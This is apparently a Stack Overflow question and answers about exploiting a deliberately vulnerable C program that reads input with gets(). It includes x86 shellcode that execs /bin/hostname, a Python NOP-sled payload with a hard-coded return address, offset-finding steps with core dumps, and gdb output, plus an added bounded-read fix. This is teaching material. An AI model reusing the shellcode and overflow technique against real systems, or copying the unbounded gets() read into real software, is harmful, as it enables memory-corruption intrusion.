I have to inject a piece of code into the buffer-overflow program below. The code should print the hostname. I have working opcodes (\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80). I have already used NOPs and a repeated return address. But I cannot get it to run the code, and I always end up with a segmentation fault. Can anyone help me with this?
Vulnerable.c

#include <stdio.h>
#include <stdlib.h>

int vulnerable(void);   /* prototype, so main() can call it before its definition */

int
main(int argc, char **argv)
{
    char *stuff = 0;    /* unused, but kept: it is part of main()'s stack layout */
    int len = 0;
    vulnerable();
    return 0;
}

int
vulnerable(void)
{
    char buf[100];
    printf("enter your name: ");
    fflush(stdout);
    gets(buf);          /* unbounded read: this is the overflow being exploited */
    printf("\"%s\"\n Welcome", buf);
    return 0;
}

I compiled the above program with the following command:

gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Shellcode.py

# Python 2: 51 NOPs, then the shellcode, then the return address repeated six times
print "\x90"*51 + "\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6

I invoked this Python program from the command line:

python shellcode.py | ./vulnerable

Posted on 2014-12-21 01:46:57
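For comparison with the vulnerable() function in the question, here is the same prompt written so that the read can never run past the 100-byte buffer. This is an added example, not code from the question or from any answer; the names read_line_bounded and hardened are chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads one line from `in` into buf[cap],
 * strips the trailing newline, and drains any excess so the next read
 * starts on a fresh line instead of on leftover bytes.
 * Returns the number of bytes stored, or -1 on EOF/error before any input. */
int read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                /* complete line: drop the newline */
    } else {
        int c;                          /* line longer than cap-1: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Hardened version of vulnerable(): same prompt, same 100-byte buffer,
 * but at most 99 bytes plus the terminator are ever written to it. */
int hardened(FILE *in)
{
    char buf[100];
    printf("enter your name: ");
    fflush(stdout);
    int n = read_line_bounded(buf, sizeof buf, in);
    if (n < 0)
        return 1;
    printf("\"%s\"\n Welcome", buf);
    return 0;
}

int main(void)
{
    return hardened(stdin);
}
```

Fed the 200-byte payload from the question, read_line_bounded stores the first 99 bytes and discards the remainder, so the saved return address is never touched.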
I suggest you enable core dumps:

ulimit -c unlimited

Then perform a simple buffer overflow, such as perl -e 'print "A"x130', and the system will generate a dump. Open it with gdb -c core and you will see %eip=0x41414141.

Then you can reduce the injected buffer, e.g. perl -e 'print "A"x120', until you get the exact buffer size needed to overwrite RET.

Posted on 2017-02-13 17:32:07
Can you describe the steps for finding the return address?
c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode
Breakpoint 1, vulnerable () at vulnerable.c:17
17 printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
called by frame at 0xbffff7cc
source language c.
Arglist at 0xbffff7bc, args:
Locals at 0xbffff7bc, Previous frame's sp is 0x0
Saved registers:
ebp at 0xbffff7bc, eip at 0xbffff7c0

This example shows the return address eip 0x80484c9 saved at 0xbffff7c0.
https://stackoverflow.com/questions/27581098